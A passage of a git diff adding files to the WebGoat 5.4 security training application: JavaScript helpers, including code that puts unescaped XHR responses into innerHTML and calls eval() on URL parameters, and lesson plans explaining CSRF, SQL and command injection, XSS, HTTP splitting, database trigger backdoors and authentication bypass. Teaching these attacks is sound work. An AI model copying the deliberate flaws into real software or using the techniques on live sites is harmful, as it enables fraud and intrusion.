0){if(unescape(nv[0])==param){
+ mn="menu"+unescape(nv[1]);
+ eval("trigMenuMagic1('"+mn+"',"+opt+")");}}}}
+ }
+
+ document.mm1Q=true;
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/javascript/sameOrigin.js b/webgoat-5.4/src/main/webapp/javascript/sameOrigin.js
new file mode 100644
index 000000000..811f95b03
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/javascript/sameOrigin.js
@@ -0,0 +1,101 @@
+
+
+
+function submitXHR(){
+
+ document.getElementById("responseTitle").innerHTML="Response: ";
+
+ document.getElementById("responseArea").innerHTML="";
+
+ alert("creating XHR request for: " + document.getElementById("requestedURL").value);
+
+
+
+ try{
+ ajaxFunction();
+ }
+ catch(err){
+ alert(err);
+ document.getElementById("requestedURL").value="";
+ }
+}
+
+
+
+function ajaxFunction()
+ {
+ var xmlHttp;
+ try
+ {
+ // Firefox, Opera 8.0+, Safari
+ xmlHttp=new XMLHttpRequest();
+ }
+ catch (e)
+ {
+ // Internet Explorer
+ try
+ {
+ xmlHttp=new ActiveXObject("Msxml2.XMLHTTP");
+ }
+ catch (e)
+ {
+ try
+ {
+ xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");
+ }
+ catch (e)
+ {
+ alert("Your browser does not support AJAX!");
+ return false;
+ }
+ }
+ }
+ xmlHttp.onreadystatechange=function()
+ {
+
+ var result = xmlHttp.responseText;
+ if(xmlHttp.readyState==4)
+ {
+
+
+ document.getElementById("responseTitle").innerHTML="Response from: "
+ + document.getElementById("requestedURL").value ;
+
+ document.getElementById("responseArea").innerHTML=result;
+
+ document.getElementById("requestedURL").value="";
+
+ }
+ }
+
+ xmlHttp.open("GET",document.getElementById("requestedURL").value,true);
+ xmlHttp.send(null);
+ }
+
+
+
+function populate(url){
+ document.getElementById("requestedURL").value=url;
+ submitXHR();
+
+
+ var webGoatURL = "lessons/Ajax/sameOrigin.jsp";
+ var googleURL = "http://www.google.com/search?q=aspect+security";
+
+ var hiddenWGStatus = document.getElementById("hiddenWGStatus");
+
+ var hiddenGoogleStatus = document.getElementById("hiddenGoogleStatus");
+
+
+ if (url == webGoatURL){
+ hiddenWGStatus.value = 1;
+ }
+
+ if (url == googleURL){
+ hiddenGoogleStatus.value = 1;
+ }
+
+ if (hiddenWGStatus.value == 1 && hiddenGoogleStatus.value == 1){
+ document.form.submit();
+ }
+}
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/javascript/toggle.js b/webgoat-5.4/src/main/webapp/javascript/toggle.js
new file mode 100644
index 000000000..82650a3e4
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/javascript/toggle.js
@@ -0,0 +1,40 @@
+var iframe;
+
+function initIframe() {
+ var body;
+ var element;
+
+ body = document.getElementsByTagName('body')[0];
+ element = document.getElementById('lessonPlans');
+
+ iframe = document.createElement('iframe');
+ iframe.style.position = "absolute";
+ iframe.style.visibility = "hidden";
+ body.appendChild(iframe);
+
+ // Configure the iFrame to border the lessonPlan
+ document.getElementsByTagName('body')[0].appendChild(element);
+ iframe.style.height = element.offsetHeight;
+ iframe.style.left = '275px';
+ iframe.style.top = '145px';
+ iframe.style.width = '474px';
+}
+
+
+function toggle(id) {
+ element = document.getElementById(id);
+
+ if (!element) return;
+
+ if (element.style.visibility=='visible' || element.style.visibility=='') {
+ iframe.style.visibility = 'hidden';
+ element.style.visibility = 'hidden';
+ element.style.overflow = 'hidden';
+ element.style.height='1';
+ } else {
+ iframe.style.visibility= 'visible';
+ element.style.visibility = 'visible';
+ element.style.overflow = 'visible';
+ element.style.height='';
+ }
+ }
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/AccessControlMatrix.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/AccessControlMatrix.html
new file mode 100644
index 000000000..576bf3b72
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/AccessControlMatrix.html
@@ -0,0 +1,9 @@
+
+
Lesson Plan Title: Using an Access Control Matrix
+
Concept / Topic To Teach:
+
+In a role-based access control scheme, a role represents a set of access permissions and privileges. A user can be assigned one or more roles. A role-based access control scheme normally consists of two parts: role permission management and role assignment. A broken role-based access control scheme might allow a user to perform accesses that are not allowed by his/her assigned roles, or somehow allow privilege escalation to an unauthorized role.
+General Goal(s):
+Each user is a member of a role that is allowed to access only certain resources. Your goal is to explore the access control rules that govern this site. Only the [Admin] group should have access to the 'Account Manager' resource.
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/BackDoors.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/BackDoors.html
new file mode 100644
index 000000000..c4ac8a08a
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/BackDoors.html
@@ -0,0 +1,23 @@
+
+
Lesson Plan Title: How to Create Database Back Door Attacks.
+
Concept / Topic To Teach:
+How to Create Database Back Door Attacks.
+
+
+How the attacks works:
+
+Databases are used usually as a backend for web applications. Also it is used as a media of storage. It can also
+be used as a place to store a malicious activity such as a trigger. A trigger is called by the database management
+system upon the execution of another database operation like insert, select, update or delete. An attacker for example
+can create a trigger that would set his email address instead of every new user's email address.
+
General Goal(s):
+
+* Your goal should be to learn how you can exploit a vulnerable query to create a trigger.
+
Lesson Plan Title: Basic Authentication
+
Concept / Topic To Teach:
+
+Basic Authentication is used to protect server side resources. The web server will send a 401 authentication request with the response for the requested resource. The client side browser will then prompt the user for a user name and password using a browser supplied dialog box. The browser will base64 encode the user name and password and send those credentials back to the web server. The web server will then validate the credentials and return the requested resource if the credentials are correct. These credentials are automatically resent for each page protected with this mechanism without requiring the user to enter their credentials again.General Goal(s):
+For this lesson, your goal is to understand Basic Authentication and answer the questions below.
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/BlindSqlInjection.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/BlindSqlInjection.html
new file mode 100644
index 000000000..0ff76e32e
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/BlindSqlInjection.html
@@ -0,0 +1,15 @@
+
+
Lesson Plan Title: How to Perform Blind SQL Injection
+
Concept / Topic To Teach:
+
+SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks an incredible number of systems on the internet are susceptible to this form of attack.
+General Goal(s):
+The form below allows a user to enter an account number and determine if it is valid or not. Use this form to develop a true / false test check other entries in the database.
+
Lesson Plan Title: How to Perform Cross Site Request Forgery.
+
Concept / Topic To Teach:
+ This lesson teaches how to perform Cross Site Request Forgery (CSRF) attacks.
+
+
+How the attacks works:
+
+Cross-Site Request Forgery (CSRF/XSRF) is an attack that tricks the victim into loading a page that contains img links like the one below:
+
+
<img src="http://www.mybank.com/sendFunds.do?acctId=123456 "/>
+
+When the victim's browser attempts to render this page, it will issue a request to www.mybank.com to the transferFunds.do page with the specified parameters. The browser will think the link is to get an image, even though it actually is a funds transfer function.
+
+The request will include any cookies associated with the site. Therefore, if the user has authenticated to the site, and has either a permanent cookie or even a current session cookie, the site will have no way to distinguish this from a legitimate user request.
+
+In this way, the attacker can make the victim perform actions that they didn't intend to, such as logout, purchase item, or any other function provided by the vulnerable website
+
General Goal(s):
+
+Your goal is to send an email to a newsgroup that contains an image whose URL is pointing to a malicious request. Try to include a 1x1 pixel image that includes a URL. The URL should point to the CSRF lesson with an extra parameter "transferFunds=4000". You can copy the shortcut from the left hand menu by right clicking on the left hand menu and choosing copy shortcut. Whoever receives this email and happens to be authenticated at that time will have his funds transferred. When you think the attack is successful, refresh the page and you will find the green check on the left hand side menu.Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values.
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/ChallengeScreen.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/ChallengeScreen.html
new file mode 100644
index 000000000..b3d9b3321
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/ChallengeScreen.html
@@ -0,0 +1,7 @@
+
+
Lesson Plan Title: Putting it all together
+
Concept / Topic To Teach:
+This lesson creates a challenge that will help the student apply all that they have learned.General Goal(s):
+
Lesson Plan Title: Client Side Filtering
+
Concept / Topic To Teach:
+
+It is always a good practice to send to the client only information which they are supposed
+to have access to. In this lesson, too much information is being sent to the client, creating
+a serious access control problem.
+
+General Goal(s):
+For this exercise, your mission is exploit the extraneous information being returned by the
+server to discover information to which you should not have access.
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/ClientSideValidation.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/ClientSideValidation.html
new file mode 100644
index 000000000..e712b6fb7
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/ClientSideValidation.html
@@ -0,0 +1,15 @@
+
+
Lesson Plan Title: Insecure Client Storage
+
Concept / Topic To Teach:
+
+It is always a good practice to validate all input on the server side. Leaving the
+mechanism for validation on the client side leaves it vulnerable to reverse
+engineering. Remember, anything on the client side should not be
+considered a secret.
+
+General Goal(s):
+For this exercise, your mission is to discover a coupon code to receive an unintended
+discount. Then, exploit the use of client side validation to submit an order with a
+cost of zero.
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/CommandInjection.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/CommandInjection.html
new file mode 100644
index 000000000..1db97ab80
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/CommandInjection.html
@@ -0,0 +1,12 @@
+
+
Lesson Plan Title: How to Perform Command Injection
+
Concept / Topic To Teach:
+
+Command injection attacks represent a serious threat to any parameter-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks an incredible number of systems on the internet are susceptible to this form of attack.General Goal(s):
+The user should be able to execute any command on the hosting OS.
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/ConcurrencyCart.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/ConcurrencyCart.html
new file mode 100644
index 000000000..4a2f44b75
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/ConcurrencyCart.html
@@ -0,0 +1,22 @@
+
+
+
+
+ Lesson Plan
+
+
+
+
+
Lesson Plan Title: Shopping Cart Concurrency Flaw
+
Concept / Topic To Teach:
+
+ Web applications can handle many HTTP requests simultaneously. Developers often use variables that are not thread safe. Thread safety means that the fields of an object or class always maintain a valid state when used concurrently by multiple threads. It is often possible to exploit a concurrency bug by loading the same page as another user at the exact same time. Because all threads share the same method area, and the method area is where all class variables are stored, multiple threads can attempt to use the same class variables concurrently. General Goal(s):
+For this exercise, your mission is to exploit the concurrency issue which will allow you to purchase merchandise for a lower price.
+
+
Lesson Plan Title: How to Perform Cross Site Scripting (XSS)
+
Concept / Topic To Teach:
+
+It is always a good practice to scrub all inputs, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere. Users should not be able to create message content that could cause another user to load an undesirable page or undesirable content when the user's message is retrieved.General Goal(s):
+For this exercise, you will perform stored and reflected XSS attacks. You will also implement code changes in the web application to defeat these attacks.
+
+
Lesson Plan Title: CSRF User Prompt By-Pass
+
Concept / Topic To Teach:
+This lesson teaches how to perform CSRF attacks that by-pass user confirmation prompts.
+
+
+How the attacks works:
+
+Cross-Site Request Forgery (CSRF/XSRF) is an attack that tricks the victim into loading a page
+that contains a 'forged request' to execute commands with the victim's credentials. Prompting
+a user to confirm or cancel the command might sound like a solution, but can be by-passed if
+the prompt is scriptable. This lesson shows how to by-pass such a prompt by issuing another
+forged request. This can also apply to a series of prompts such as a wizard or issuing multiple
+unrelated forged requests.
+
+
+
General Goal(s):
+
+Similar to the CSRF Lesson, your goal is to send an email to a newsgroup that contains multiple
+malicious requests: the first to transfer funds, and the second a request to confirm the prompt
+that the first request triggered. The URL should point to the CSRF lesson with an extra
+parameter "transferFunds=4000", and "transferFunds=CONFIRM". You can copy the shortcut from the
+left hand menu by right clicking on the left hand menu and choosing copy shortcut. Whoever
+receives this email and happens to be authenticated at that time will have his funds transferred.
+When you think the attack is successful, refresh the page and you will find the green check on
+the left hand side menu.Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values.
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/CsrfTokenByPass.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/CsrfTokenByPass.html
new file mode 100644
index 000000000..b57ea6b83
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/CsrfTokenByPass.html
@@ -0,0 +1,38 @@
+
+
Lesson Plan Title: CSRF Token Prompt By-Pass
+
Concept / Topic To Teach:
+This lesson teaches how to perform CSRF attacks on sites that use tokens to mitigate CSRF attacks, but are vulnerable to CSS attacks.
+
+
+How the attacks works:
+
+
+Cross-Site Request Forgery (CSRF/XSRF) is an attack that tricks the victim into
+loading a page that contains a 'forged request' to execute commands with the
+victim's credentials.
+
+
Token-based request authentication mitigates these attacks. This technique
+inserts tokens into pages that issue requests. These tokens are required to
+complete a request, and help verify that requests are not scripted. CSRFGuard from OWASP uses
+this technique to help prevent CSRF attacks.
+
+
However, this technique can be by-passed if CSS vulnerabilities exist on the same site.
+Because of the same-origin browser policy, pages from the same domain can read content from
+other pages from the same domain.
+
+
General Goal(s):
+
+Similar to the CSRF Lesson, your goal is to send an email to a newsgroup that contains a malicious
+request to transfer funds. To successfully complete you need to obtain a valid request token.
+The page that presents the transfer funds form contains a valid request token. The URL for the
+transfer funds page is the same as this lesson with an extra parameter "transferFunds=main". Load
+this page, read the token and append the token in a forged request to transferFunds. When you think
+the attack is successful, refresh the page and you will find the green check on the left hand side menu.Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values.
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/DBCrossSiteScripting.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/DBCrossSiteScripting.html
new file mode 100755
index 000000000..a54fd9ab9
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/DBCrossSiteScripting.html
@@ -0,0 +1,24 @@
+
+
Lesson Plan Title: How to Perform Cross Site Scripting
+(XSS)
+
Concept / Topic To Teach:
+
+It is always a good practice to scrub all inputs, especially those
+inputs that will later be used as parameters to OS commands, scripts,
+and database queries. It is particularly important for content that will
+be permanently stored somewhere. Users should not be able to create
+message content that could cause another user to load an undesirable
+page or undesirable content when the user's message is retrieved.
+General Goal(s):
+For this exercise, you will perform a stored XSS attack.
+You will also implement code changes in the database to defeat
+these attacks.
+
+
Lesson Plan Title: How to Perform SQL Injection
+
Concept / Topic To Teach:
+
+It is always a good practice to scrub all inputs, especially those
+inputs that will later be used as parameters to OS commands, scripts,
+and database queries. Users should not be able to alter the intent of
+commands that are executed on the server, in many cases as a privileged user.
+
+General Goal(s):
+For this exercise, you will perform a SQL Injection attack.
+You will also implement code changes in the database to defeat
+these attacks.
+
+
Lesson Plan Title: How to Perform DOM Injection Attack.
+
Concept / Topic To Teach:
+How to perform DOM injection attacks.
+
+
+How the attacks works:
+
+Some applications specially the ones that uses AJAX manipulates and updates the DOM
+directly using javascript, DHTML and eval() method.
+An attacker may take advantage of that by intercepting the reply and try to inject some
+javascript commands to exploit his attacks.
+
General Goal(s):
+
+* Your victim is a system that takes an activation key to allow you to use it.
+
Lesson Plan Title: DOM Based Cross Site Scripting (XSS)
+
Concept / Topic To Teach:
+
+The Document Object Model (DOM) presents an interesting problem from
+a security standpoint. It allows the content of a web page to be dynamically
+modified, but that can be abused by attackers during a malicious code injection. XSS,
+a type of malicious code injection, can occur when unvalidated user input is used directly
+to modify the content of a page on the client side.
+
+General Goal(s):
+For this exercise, your mission is to use this vulnerability to inject
+malicious code into the DOM. Then in the last stage, you will correct
+the flaws in the code to address the vulnerability.
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/DOS_Login.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/DOS_Login.html
new file mode 100644
index 000000000..941a89b49
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/DOS_Login.html
@@ -0,0 +1,9 @@
+
+
Lesson Plan Title: Denial of Service from Multiple Logins
+
Concept / Topic To Teach:
+
+Denial of service attacks are a major issue in web applications. If the end user cannot conduct business or perform the service offered by the web application, then both time and money is wasted.
+General Goal(s):
+This site allows a user to login multiple times. This site has a database connection pool that allows 2 connections. You must obtain a list of valid users and create a total of 3 logins.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/DangerousEval.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/DangerousEval.html
new file mode 100644
index 000000000..f6190530c
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/DangerousEval.html
@@ -0,0 +1,14 @@
+
+
Lesson Plan Title: Dangerous Use of Eval
+
Concept / Topic To Teach:
+
+It is always a good practice to validate all input on the server side. XSS can occur
+when unvalidated user input is reflected directly into an HTTP response. In this lesson, unvalidated
+user-supplied data is used in conjunction with a Javascript eval() call. In a reflected
+XSS attack, an attacker can craft a URL with the attack script and store it on another
+website, email it, or otherwise trick a victim into clicking on it.
+
+General Goal(s):
+For this exercise, your mission is to come up with some input which, when run through eval,
+will execute a malicious script. In order to pass this lesson, you must 'alert()' document.cookie.
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/Encoding.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/Encoding.html
new file mode 100644
index 000000000..fcba2ddac
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/Encoding.html
@@ -0,0 +1,9 @@
+
+
Lesson Plan Title: How to Peform Basic Encoding
+
Concept / Topic To Teach:
+
+Different encoding schemes can be used in web applications for different reasons.
+
+General Goal(s):
+This lesson will familiarize the user with different encoding schemes.
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/FailOpenAuthentication.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/FailOpenAuthentication.html
new file mode 100644
index 000000000..27a82e2cf
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/FailOpenAuthentication.html
@@ -0,0 +1,10 @@
+
+
Lesson Plan Title: How to Bypass Fail Open Authentication
+
Concept / Topic To Teach:
+
+ This lesson presents the basics for understanding the "fail open" condition regarding authentication. The security term, “fail open” describes a behavior of a verification mechanism. This is when an error (i.e. unexpected exception) occurs during a verification method causing that method to evaluate to true. This is especially dangerous during login. General Goal(s):
+ The user should be able to bypass the authentication check.
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/ForcedBrowsing.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/ForcedBrowsing.html
new file mode 100644
index 000000000..2bf4fa6a4
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/ForcedBrowsing.html
@@ -0,0 +1,21 @@
+
+
Lesson Plan Title: How to Perform Forced Browsing Attacks.
+
Concept / Topic To Teach:
+How to Exploit Forced Browsing.
+
+
+How the attacks works:
+
+Forced browsing is a technique used by attackers to gain access to resources that are not referenced, but are nevertheless accessible.
+
+One technique is to manipulate the URL in the browser by deleting sections from the end until an unprotected directory is found
+
General Goal(s):
+
+* Your goal should be to try to guess the URL for the "config" interface.
+
Lesson Plan Title: How to Exploit the Forgot Password Page
+
Concept / Topic To Teach:
+
+Web applications frequently provide their users the ability to retrieve a forgotten password. Unfortunately, many web applications fail to implement the mechanism properly. The information required to verify the identity of the user is often overly simplistic.
+General Goal(s):
+Users can retrieve their password if they can answer the secret question properly. There is no lock-out mechanism on this 'Forgot Password' page. Your username is 'webgoat' and your favorite color is 'red'. The goal is to retrieve the password of another user.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/HiddenFieldTampering.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/HiddenFieldTampering.html
new file mode 100644
index 000000000..dff0d945e
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/HiddenFieldTampering.html
@@ -0,0 +1,12 @@
+
+
Lesson Plan Title: How to Exploit Hidden Fields
+
Concept / Topic To Teach:
+
+Developers will use hidden fields for tracking, login, pricing, etc.. information on a loaded page. While this is a convenient and easy mechanism for the developer, they often don't validate the information that is received from the hidden field. This lesson will teach the attacker to find and modify hidden fields to obtain a product for a price other than the price specified General Goal(s):
+The user should be able to exploit a hidden field to obtain a product at an incorrect price.
+
+Try to purchase the HDTV for less than the purchase price, if you have not done so already.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/HowToWork.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/HowToWork.html
new file mode 100644
index 000000000..551f7cb32
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/HowToWork.html
@@ -0,0 +1,43 @@
+
+How To Work With WebGoat
+
+Welcome to a short introduction to WebGoat.
+Environment Information
+
+WebGoat uses the Apache Tomcat server. It is configured to run on localhost although this can be
+easily changed. This
+configuration is for single user, additional users can be added in the tomcat-users.xml file.
+If you want to use WebGoat in a laboratory or in
+class you might need to change this setup. Please refer to the Tomcat Configuration
+in the Introduction section.
+
+The WebGoat Interface
+
+
+Solve The Lesson
+
+Always start with the lessons plan. Then try to solve the lesson and if necessary,
+use the hints. The last hint is the solution text if applicable. If you cannot solve the lesson using the hints, you may view the
+solution for complete details.
+Read And Edit Parameters
+
+To read and edit Parameters you need a local proxy to intercept the HTTP request.
+Here we use WebScarab. More information on WebScarab can be found in the "Useful Tools" Chapter.
+
+Read And Edit Cookies
+
+Often it is not only necessary to change the value of the parameters but to change the value of cookies.
+WebScarab has functionality for this as well.
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/HtmlClues.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/HtmlClues.html
new file mode 100644
index 000000000..c0d81446c
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/HtmlClues.html
@@ -0,0 +1,12 @@
+
+
Lesson Plan Title: How to Discover Clues in the HTML
+
Concept / Topic To Teach:
+
+ Developers are notorious for leaving statements like FIXME's, TODO's, Code Broken, Hack, etc... inside the source code. Review the source code for any comments denoting passwords, backdoors, or something doesn't work right.
+ Below is an example of a forms based authentication form. Look for clues to help you log in.
+
+General Goal(s):
+The user should be able to bypass the authentication check.
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/HttpBasics.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/HttpBasics.html
new file mode 100644
index 000000000..011fed218
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/HttpBasics.html
@@ -0,0 +1,27 @@
+
+
Lesson Plan Title: Http Basics
+
Concept / Topic To Teach:
+ This lesson presents the basics for understanding the transfer of data between the browser and the web application.
+
+How HTTP works:
+
+All HTTP transactions follow the same general format. Each client request and server response has three parts: the request or response line, a header section, and the entity body. The client initiates a transaction as follows:
+
+ The client contacts the server and sends a document request
+
GET /index.html?param=value HTTP/1.0
+ Next, the client sends optional header information to inform the server of its configuration and the document formats it will accept.User-Agent: Mozilla/4.06 Accept: image/gif,image/jpeg, */*
+After sending the request and headers, the client may send additional data. This data is mostly used by CGI programs using the POST method.General Goal(s):
+
+Enter your name in the input field below and press "go" to submit. The server will accept the request, reverse the input, and display it back to the user, illustrating the basics of handling an HTTP request.
+
+
Lesson Plan Title: HttpOnly Test
+
Concept / Topic To Teach:
+
+To help mitigate the cross site scripting threat, Microsoft has
+introduced a new cookie attribute entitled 'HttpOnly.' If this flag is
+set, then the browser should not allow client-side script to access the
+cookie. Since the attribute is relatively new, several browsers neglect
+to handle the new attribute properly.
+For a list of supported browsers see: OWASP HTTPOnly Support
+
General Goal(s):
+The purpose of this lesson is to test whether your browser supports the
+HTTPOnly cookie flag. Note the value of the
+unique2u
+cookie. If your browser supports HTTPOnly, and you enable it for a
+cookie, client side code should NOT be able to read OR write to that
+cookie, but the browser can still send its value to the server. Some
+browsers only prevent client side read access, but don't prevent write
+access.
+
+
Lesson Plan Title: How to Perform HTTP Splitting
+
Concept / Topic To Teach:
+ This lesson teaches how to perform HTTP Splitting attacks.
+
+
+How the attack works:
+
+
The attacker passes malicious code to the web server together with normal input.
+A victim application will not be checking for CR (carriage return, also given by %0d or \r)
+and LF (line feed, also given by %0a or \n) characters. These characters not only give attackers control
+of the remaining headers and body of the response the application intends to send,
+but they also allows them to create additional responses entirely under their control.
+
The effect of an HTTP Splitting attack is maximized when accompanied with a Cache Poisoning. The goal of
+Cache Poisoning attack is to poison the cache of the victim by fooling the cache into believing that the page
+hijacked using the HTTP splitting is an authentic version of the server's copy.
+
The attack works by using the HTTP Splitting attack plus adding the Last-Modified: header and setting it
+to a future date. This forces the browser to send an incorrect If-Modified-Since request header on future requests.
+Because of this, the server will always report that the (poisoned) page has not changed, and the victim's browser
+will continue to display the attacked version of the page.
+
A sample of a 304 response is:
+
HTTP/1.1 304 Not Modified
+
+
General Goal(s):
+
+This lesson has two stages. Stage 1 teaches you how to do HTTP Splitting attacks while stage 2 builds on that to teach you how to elevate HTTP Splitting to Cache Poisoning.
+Enter a language for the system to search by. You will notice that the application is redirecting your request to another resource on the server. You should be able to use the CR (%0d) and LF (%0a) characters to exploit the attack. Your goal should be to force the server to send a 200 OK. If the screen changed as an effect to your attack, just go back to the homepage. After stage 2 is exploited successfully, you will find the green check in the left menu.
+You may find the PHP Charset Encoder useful. The Encode and DecodeURIComponent buttons translate CR and LF.
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/InsecureLogin.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/InsecureLogin.html
new file mode 100644
index 000000000..a33256309
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/InsecureLogin.html
@@ -0,0 +1,14 @@
+
+
Lesson Plan Title: Insecure Login
+
Concept / Topic To Teach:
+
+Sensitive data should never sent in plaintext! Often applications
+switch to a secure connection after the authorization. An attacker
+could just sniff the login and use the gathered information to
+break into an account. A good webapplication always takes care of
+encrypting sensitive data.
+General Goal(s):
+See how easy it is to sniff a password in plaintext.
+
Lesson Plan Title: How to Perform JSON Injection
+
Concept / Topic To Teach:
+This lesson teaches how to perform JSON Injection Attacks.
+
+
+How the attacks works:
+
+JavaScript Object Notation (JSON) is a simple and effective lightweight data exchange format. JSON can be in a lot of forms such as arrays, lists, hashtables and other data structures.
+JSON is widely used in AJAX and Web2.0 application and is favored by programmers over XML because of its ease of use and speed.
+However, JSON, like XML is prone to Injection attacks. A malicious attacker can inject the reply from the server and inject some arbitrary values in there.
+
+
General Goal(s):
+
+* You are traveling from Boston, MA- Airport code BOS to Seattle, WA - Airport code SEA.
+
Lesson Plan Title: How to Bypass Client Side JavaScript Validation
+
Concept / Topic To Teach:
+
+Client-side validation should not be considered a secure means of validating parameters. These validations only help reduce the amount of server processing time for normal users who do not know the format of required input. Attackers can bypass these mechanisms easily in various ways. Any client-side validation should be duplicated on the server side. This will greatly reduce the likelihood of insecure parameter values being used in the application.
+
+General Goal(s):
+For this exercise, the web site requires that you follow certain rules when you fill out a form. The user should be able to break those rules, and send the website input that it wasn't expecting. You must break all 7 validators at the same time.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/Lesson_Plan_Template.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/Lesson_Plan_Template.html
new file mode 100644
index 000000000..66293a95c
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/Lesson_Plan_Template.html
@@ -0,0 +1,17 @@
+
+
+Concept / Topic To Teach:
+Standards Addressed:
+General Goal(s):
+Specific Objectives:
+Required Materials:
+Anticipatory Set (Lead-In):
+Step-By-Step Procedures:
+Plan For Independent Practice:
+Closure (Reflect Anticipatory Set):
+Assessment Based On Objectives:
+Extensions (For Gifted Students):
+Possible Connections To Other Subjects:
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/LogSpoofing.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/LogSpoofing.html
new file mode 100644
index 000000000..105e38f54
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/LogSpoofing.html
@@ -0,0 +1,20 @@
+
+
Lesson Plan Title: How to Perform Log Spoofing.
+
Concept / Topic To Teach:
+ This lesson teaches attempts to fool the human eye.
+
+
+How the attacks works:
+The attack is based on fooling the humane eye in log files. An attacker can erase his traces from the logs
+using this attack.
+
+
General Goal(s):
+
+* The grey area below represents what is going to be logged in the web server's log file.
+
Lesson Plan Title: Multi Level Login 1
+
Concept / Topic To Teach:
+
+A Multi Level Login should provide a strong authentication.
+This is archived by adding a second layer. After having
+logged in with your user name and password you are asked
+for a 'Transaction Authentication Number' (TAN). This is
+often used by online banking. You get a list with a lots
+of TANs generated only for you by the bank. Each TAN is used only once.
+Another method is to provide the TAN by SMS. This has
+the advantage that an attacker can not get TANs provided
+by the user.
+General Goal(s):
+In this Lesson you try to get around the strong authentication.
+You have to break into another account. The user name, password and a
+already used TAN is provided. You have to make sure
+the server accept the TAN even it is already used.
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/MultiLevelLogin2.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/MultiLevelLogin2.html
new file mode 100644
index 000000000..3514b7148
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/MultiLevelLogin2.html
@@ -0,0 +1,20 @@
+
+
Lesson Plan Title: Multi Level Login 2
+
Concept / Topic To Teach:
+
